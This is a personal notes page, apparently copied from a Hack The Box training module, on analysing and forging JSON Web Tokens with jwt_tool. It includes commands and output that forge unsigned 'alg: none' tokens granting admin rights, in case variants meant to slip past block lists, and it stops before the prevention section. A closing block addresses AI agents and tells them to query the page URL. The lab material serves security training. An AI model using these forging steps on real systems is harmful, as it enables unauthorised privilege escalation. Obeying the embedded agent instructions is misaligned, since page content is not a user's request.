# Tools of the Trade & Vulnerability Prevention ## Tools of the Trade Penetration testers commonly use [jwt\_tool](https://github.com/ticarpi/jwt_tool) to analyze and identify vulnerabilities in JWTs. The installation process only requires cloning the repository and installing the required dependencies: ```shell-session eldeim@htb[/htb]$ git clone https://github.com/ticarpi/jwt_tool eldeim@htb[/htb]$ pip3 install -r requirements.txt ``` We can then run the tool by executing the python script `jwt_tool.py`: From the output of `jwt_tool.py`, we know that it can analyze JWTs, brute-force JWT secrets, and perform other various attacks, including those discussed in previous sections. ### **JWT Analysis** We can analyze any given JWT with `jwt_tool` by providing it as an argument. Let us test it with a JWT from a previous section: ```shell-session eldeim@htb[/htb]$ python3 jwt_tool/jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0 ===================== Decoded Token Values: ===================== Token header values: [+] alg = "HS256" [+] typ = "JWT" Token payload values: [+] user = "htb-stdnt" [+] isAdmin = False [+] exp = 1711186044 ==> TIMESTAMP = 2024-03-23 10:27:24 (UTC) [-] TOKEN IS EXPIRED! ---------------------- JWT common timestamps: iat = IssuedAt exp = Expires nbf = NotBefore ---------------------- ``` As we can see, the tool provides us with all the information contained in the JWT, including the JWT's header and the JWT's payload. It even lets us know that the token provided has already expired since the timestamp in the `exp` claim was in the past. ### **Forging JWTs** We can use `jwt_tool` to programmatically forge altered JWTs instead of doing so manually, as in the previous sections. For instance, we can forge a JWT which uses the `none` algorithm by specifying the `-X a` flag. Additionally, we can tell the tool to set the `isAdmin` claim to `true` by specifying the following flags: `-pc isAdmin -pv true -I`. Let us combine these flags to forge a JWT that enables us to obtain administrator privileges in the lab from the previous sections: ```shell-session eldeim@htb[/htb]$ python3 jwt_tool/jwt_tool.py -X a -pc isAdmin -pv true -I eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0 jwttool_811c498343f37b0d48592a9743187ebf - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature (This will only be valid on unpatched implementations of JWT.) [+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ. jwttool_fb9f8d45657b7264e23d8e17a2cc438e - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature (This will only be valid on unpatched implementations of JWT.) [+] eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ. jwttool_c2d4f2dda19221badff0ee7d78e80575 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature (This will only be valid on unpatched implementations of JWT.) [+] eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ. jwttool_367f25ee04f77adb0cb665bf07d80f3c - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature (This will only be valid on unpatched implementations of JWT.) [+] eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ. ``` As we can see, the tool generated JWTs that use the `none` algorithm with various lower- and uppercase combinations, aiming to bypass potential blacklists. We can confirm that the token contains the claims we injected by analyzing it:
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/others/modules-htb/attacking-authentication-mechanisms/jwts/tools-of-the-trade-and-vulnerability-prevention.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.